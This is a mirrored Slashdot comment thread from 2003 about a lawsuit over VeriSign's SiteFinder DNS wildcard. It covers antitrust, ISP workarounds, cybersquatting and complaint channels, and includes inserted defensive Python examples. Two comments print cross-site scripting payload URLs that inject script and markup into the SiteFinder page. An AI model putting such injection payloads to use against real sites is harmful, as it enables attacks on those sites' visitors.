Slashdot Mirror


VeriSign Sued Over SiteFinder Service

dmehus writes "It was only a matter of time, the pundits said, and they were right. Popular Enterprises, LLC., an Orlando, Florida based cybersquatting so-called 'search services' company, has filed a lawsuit in Orlando federal court against VeriSign, Inc. over VeriSign's controversial SiteFinder 'service.' While Popular Enterprises has had a dodgy history of buying up thousands of expired domain names and redirecting them to its Netster.com commercial "search services" site, the lawsuit is most likely a good thing, as it provides one more avenue to pursue in getting VeriSign to terminate SiteFinder. According to the lawsuit, the company alleges antitrust violations, unfair competition and violations of the Deceptive and Unfair Trade Practices Act. It asks the court to order VeriSign to put a halt to the service. VeriSign spokesperson Brian O'Shaughnessy said the company has not yet seen the lawsuit and that it doesn't comment on pending litigation."

20 of 403 comments

  1. Nice tactic. by NightSpots · · Score: 5, Informative

    Anti-trust was one of the very few tactics I didn't hear discussed as possible ways to stop Verisign.

    Arguing that they get for free what other companies must pay for is probably one of the easier arguments to win, since it proves itself nearly by definition.

    I applaud the jackass who pays to abuse typos. At least they've finally proven their worth.

    1. Re:Nice tactic. by nocomment · · Score: 5, Informative

      Don't forget the petition!!! Go sign it.

      http://www.petitiononline.com/icanndns/

      --
      /* oops I accidentally made a comment, sorry */
      /* http://allyourbasearebelongto.us */
  2. Most ISPs have blocked it by Amsterdam+Vallon · · Score: 4, Informative

    *Confirmed*: Adelphia has blocked VeriSign's new "service."

    Please reply to this and list names of fellow anti-VeriSign ISPs if your ISP has blocked this new "feature" as well.

    Thanks! I will enjoy analyzing this data.

    --

    Reply or e-mail; don't vaguely moderate. Ex-O'Reilly/MIT employee, now a full-time Google employee.
    1. Re:Most ISPs have blocked it by shostiru · · Score: 5, Informative
      We (mid-sized midwestern ISP) had our main nameservers (tinydns and djbdns) patched by 2AM the night this mess started, using the patches we found here. By a few hours later, I'd kludged the BIND source myself on a couple of other machines to return NXDOMAIN for anything in all three of the /24 netblocks in AS30060 (it worked fine, at least until the ISC patch was released). AFAIK our customers never even noticed the wildcarding.

      If you work in an ISP or other network infrastructure company, you know first-hand the degree of astonishment and rage that Verisign's move elicited; the fallout (spam filtration, security, network monitoring, etc.) goes far beyond HTTP. I don't think any of us slept much that night ... it only took a few hours to restore normal DNS behaviour, the remaining ten or so I spent in shock with my jaw scraping the floor.

      I've dealt with Verisign before (try getting decent documentation on the cybercash application library!) and knew they were greedy and stupid, but I wasn't counting on raw, unfettered eeeeeevil.
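
The workaround this comment describes, turning wildcard answers back into NXDOMAIN, sketched as an added example; it is not the djbdns or BIND patch the commenter used. The /24 netblocks are not listed on this page, so the filter is keyed on the single address 64.94.110.11 quoted elsewhere in the thread, and `stub_resolve`, `REGISTERED` and the function names are constructed for the illustration.

```python
import ipaddress
import secrets

# Address the thread reports for non-existent .com names. The /24 netblocks
# the comment mentions are not on the page, so only this host is listed.
WILDCARD_NETS = [ipaddress.ip_network("64.94.110.11/32")]

def is_wildcard_answer(addrs, nets=WILDCARD_NETS):
    """True when every returned A record falls inside a known wildcard net."""
    ips = [ipaddress.ip_address(a) for a in addrs]
    return bool(ips) and all(any(ip in net for net in nets) for ip in ips)

def filtered_lookup(name, resolve, nets=WILDCARD_NETS):
    """Wrap a resolver so wildcard answers read as NXDOMAIN (None) again."""
    addrs = resolve(name)
    if addrs is None or is_wildcard_answer(addrs, nets):
        return None
    return addrs

def detect_wildcard(tld, resolve, probes=3):
    """Look up random labels that are almost certainly unregistered and
    return the addresses common to every answer (empty set: no wildcard)."""
    common = None
    for _ in range(probes):
        label = secrets.token_hex(16)
        addrs = resolve(f"{label}.{tld}")
        if addrs is None:          # a genuine NXDOMAIN means no wildcard
            return set()
        common = set(addrs) if common is None else common & set(addrs)
    return common or set()

# Constructed stub standing in for an unpatched recursive resolver.
REGISTERED = {"example.com": ["192.0.2.10"]}

def stub_resolve(name):
    if name in REGISTERED:
        return REGISTERED[name]
    if name.endswith(".com"):
        return ["64.94.110.11"]    # wildcard answer instead of NXDOMAIN
    return None                    # real NXDOMAIN
```

The same `filtered_lookup` wrapper restores the "does the sender's domain exist" check that mail filters rely on.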

    2. Re:Most ISPs have blocked it by jms · · Score: 4, Informative

      Speakeasy appears to have blocked the "feature".

    3. Re:Most ISPs have blocked it by MattCohn.com · · Score: 3, Informative

      Comcast has also not blocked this.

  3. and the IETF now has an Internet-Draft by shostiru · · Score: 5, Informative
    which I just found, draft-main-typo-wcard-02. Worth a look, as is the IETF mailing list archive. They're definitely aware of the problem. I particularly like the following paragraph from the Internet-Draft:
    An error response that only works correctly in one situation would be as bad as an SMTP server that ignored its input and always produced a fixed sequence of responses: it would work in the one situation it was designed to expect, but cause chaos whenever presented with any other situation.
    sounds like the Snubby Mail Rejector, hmm?
  4. Re:I've never understood by marphod · · Score: 4, Informative

    How is it different from the pioneers getting 40 acres and a mule?

    First, a history lesson. '40 Acres and a Mule' wasn't a pioneer issue. While it is true that during the western rushes, various federal lands were put up for auction or claim by pioneers. The lands were not, however, specified to be 40 acres, but varied in size based on the territory and the specific land grant. For that matter, according to one of my HS Social Studies teachers (a dozen years ago), there were still federal lands for claim in parts of Alaska. That teacher was known to embellish the truth, so I won't put any veracity statement with that.

    '40 acres and a mule' were reparations for slaves in the south. They were instituted by a Northern (Union) general, during the aftermath of the civil war, and were later reversed by a presidential executive order.

    So, in short, your parallel falls a little short. If the ICANN were to pass a ruling granting johnny-come-latelies names from vast corporate pools, that would be comparable.

    So, what's wrong with cybersquatting: Well, with the federal land grants, if you occupied and developed the federal lands for a specified period of time, they became yours. You could sell or otherwise use them as you wished. Here, cybersquatters either are taking a developed item (debatably property) and using its good will and value for an interest contrary to the original owners. Which would be a violation of the land grants, so that's one point where your analogy fails.

    The other type of cybersquatter (who speculates on names or misspellings) is also abusing the good will of the originator, but may be a valid comparison. It is, however, annoying, to get redirected away from what you wanted because of a typo, and from the other side, a squatter who is taking an otherwise useful resource and making it near-useless is neither providing a valid service nor generating good will.

  5. Don't badmouth Netster too bad by Tyler+Eaves · · Score: 5, Informative

    Yes, it's semi-sleazy, but they don't cybersquat.

    Timeline:

    1997 or so: I registered tylereaves.com, mainly for use in e-mail

    2000: I let the domain lapse, not really using it, and tired of paying $40 a year or so for it (Hey, registering was expensive in '97!)

    200?: Netster becomes the owner of tylereaves.com

    2003: I nicely ask for it back.
    2003: I get my domain back. They didn't even charge me the transfer fees.

    --
    TODO: Something witty here...
  6. Technical defense against hijacked domains by ODBOL · · Score: 5, Informative

    This is a good time to look at Bob Frankston's dotDNS proposal for a layer of reliable but meaningless domain names. dotDNS lookups can be made self-verifiable using public-key signatures, but without the costly chain of trust required by DNSSEC methods. The validity of a dotDNS binding can be verified easily by the querier, without relying at all on the server that provided the putative binding.

    dotDNS does not solve the whole problem, since any layer that translates from humanly meaningful names to dotDNS names is still vulnerable to hijacking. But the reliable and verifiable name bindings in dotDNS will make it *much* easier to switch name-resolution services when we are dissatisfied with their policies.

    dotDNS is a cheap and immediately deployable positive step toward fixing the DNS mess, requiring no approval by any central agency. It's time for a visionary sponsor to step forward and just do it.

    --
    Mike O'Donnell http://people.cs.uchicago.edu/~odonnell/
  7. Owning a domain you don't use by Animats · · Score: 4, Informative
    Owning a domain that wasn't in DNS used to be called a "lame delegation". At one time, about a decade ago, it was considered reasonable to garbage-collect domains that were lame delegations, but that was back before the Internet went commercial. Now you can have all the lame delegations you want.

    But why? There's no real market in domain names any more. Verisign tried to make one. GreatDomains used to have thousands of listings, and you'd see things like "Asked: $25,000. Bid: $20." Now Verisign only has "premium domains" on GreatDomains, ones like "record.com". There are only 66 domains for sale, and few sales.

  8. Re:Null space needs to remain null by kfg · · Score: 4, Informative

    "It makes me wonder if someone has a patent on silence yet?"

    No, there's too much prior art, but John Cage has a copyright on 4'33" of it.

    KFG

  9. Copy of the Lawsuit and More Details by dmehus · · Score: 3, Informative

    Full details of the lawsuit are available in this press release:
    home.businesswire.com/portal/site/google/index.jsp?epi-content=GENERIC&newsId=20030918005730&newsLang=en&beanID=478837757&viewID=news_view

    Copy of lawsuit:
    search.netster.com/about/lawsuit.asp

    Sorry, I forgot to include these links in my submission. Post away!

    Cheers,
    Doug

  10. Re:Pert Peeve by kubrick · · Score: 3, Informative

    That requirement has been relaxed lately; they're pretty loose about it now, and auDA just require that it be 'related to your business operations'. Not quite the free-for-all that .com/.net/.org is...

    --
    deus does not exist but if he does
  11. Re:I'm not surprised... by Anonymous Coward · · Score: 3, Informative
    when the url is decoded it is
    http://sitefinder.verisign.com/lpc?url='//--></script>"//--></script>><font size="
    +3"><b>If <em>she</em> loves us then we <em>have</em> to be cool!<br>
    <img src="http://www.patrick.fm/boobies/boobies.php/text/VeriSign"><br>VeriSign! Hot
    babes love us! You should too!<br><br><br><br></font&gt;|
    basically there is a point in the code where the cgi parameter url is assigned to a javascript variable. All that has to happen is close the js var declaration, html comment, and script tag.
    http://sitefinder.verisign.com/lpc?url="//--></script>malicious code<script>
    script at end opens another script tag for the original /script tag to work with, it also hides the rest of the javascript

    try these links

    Obligatory hello world example

    Micro$oft

    and a goatse.cx version
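
The flaw this comment describes, shown beside its fix as an added example; it is not part of the original post and not VeriSign's page source. `TEMPLATE` is a constructed stand-in for a page that assigns the `url` parameter to a JavaScript variable inside an HTML-commented script block, and `PAYLOAD` reuses the shape quoted in the comment with a harmless marker; all names are assumptions for the illustration.

```python
import json

# Constructed template modelled on the comment's description.
TEMPLATE = '<script><!--\nvar url = {value};\n//--></script>'

def render_vulnerable(url):
    """Raw interpolation: the value can close the string, the HTML comment
    and the script element, so the rest is parsed as page markup."""
    return TEMPLATE.format(value='"' + url + '"')

def js_string_literal(text):
    """Encode text as a JavaScript string literal that is safe in <script>."""
    # json.dumps escapes quotes, backslashes, control and non-ASCII characters.
    literal = json.dumps(text)
    # The HTML parser ends the element at "</script" no matter how the
    # JavaScript is quoted, so markup-significant characters become \uXXXX.
    for ch in '<>&':
        literal = literal.replace(ch, '\\u%04x' % ord(ch))
    return literal

def render_hardened(url):
    """Same template, with the value output-encoded for its context."""
    return TEMPLATE.format(value=js_string_literal(url))

def script_close_count(html):
    """Number of places where the markup closes a script element."""
    return html.lower().count('</script')

# Payload shape from the comment, with a harmless marker as the injected part.
PAYLOAD = '"//--></script><b>injected</b><script>'

if __name__ == '__main__':
    print(render_vulnerable(PAYLOAD))
    print(render_hardened(PAYLOAD))
```

In the hardened output the template's own closing tag is the only one left, and the browser's JavaScript engine decodes the `\uXXXX` escapes back to the original string value.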

  12. Alexa by Anonymous Coward · · Score: 3, Informative

    Alexa Page Ranking, another insidious tool, lists Verisign Pagefinder as the number one Website in new Hits, up 1360 % on the week

    http://www.alexa.com/site/ds/movers_shakers

  13. Cross Site Scripting Bug by umofomia · · Score: 3, Informative
    http://www.";alert("fuckverisign");".com
    The parent post may be modded as "Funny" but this actually is a pretty serious cross-site scripting bug introduced by Verisign. This and the hard-coded SMTP replies bug show how little thought Verisign put into the ramifications of their changes. Seriously... if you're gonna hijack the Internet, at least do it right!!
  14. not quite by Anonymous Coward · · Score: 3, Informative
    Owning a domain that wasn't in DNS used to be called a "lame delegation".

    Not quite. Owning a domain is a separate issue from DNS. Owning a domain means you have an entry in a domain registry. It does not mean you have a DNS entry. Owning a domain means you have paid your money and signed up and that you have the right to have your domain added to the DNS.

    A lame delegation is something different. A lame delegation is when there are NS records that exist in the DNS, but they point to the address of a server that can't answer the queries for that domain. In contrast, if you have a domain that isn't in DNS, there is no NS record at all.

  15. how to call Verisign and complain by chongo · · Score: 3, Informative

    In addition to a number of already posted suggestions, I recommend that you call Verisign and file a complaint:

    +1 703-742-0914 (worldwide)
    +1 888-642-9675 (toll free US/Canada)

    When you call, select:

    * 1 (purchase a product or renew an existing product)
    * then 7 (all other questions)

    I recommend that you be patient with the Verisign rep that answers the phone. That person may not fully understand the issue / problem, and they are unlikely to personally be responsible for the Verisign decision. Remember that you are objecting to what Verisign as a company is doing. Don't yell at the rep. Be polite but firm.

    Ask Verisign to stop the wildcarding now. Explain why what they are doing is wrong (such as being unable to determine if an EMail message is being sent from a bogus / non-existent domain because thisdomaindoesnotexist.com resolves to 64.94.110.11).

    If you do business with Verisign now, tell them that you will switch vendors unless Verisign stops this practice in X weeks. (fill in the X)

    You might want to leave your phone number and request a callback. Anonymous complaints do not go as far.

    If you are in the US, you might want to contact your local member of congress and object about what Verisign is doing. Let Verisign know that you are doing this when you call.

    Yes, they might flush your complaint down /dev/null. But I suspect that pressure from all fronts might help. I have been told (off the record) that some people within Verisign are not happy with their wildcarding. Complaints get logged into a database that these people can review. Your complaints, in volume, might help those folks make a stronger case against top-level wildcarding.

    --
    chongo (was here) /\oo/\
  16. how to complain about Verisign to ICANN by chongo · · Score: 4, Informative
    In addition to signing the:
    online petition

    you can file a complaint about Verisign to ICANN by using their:

    Registrar Problem Report Form
    --
    chongo (was here) /\oo/\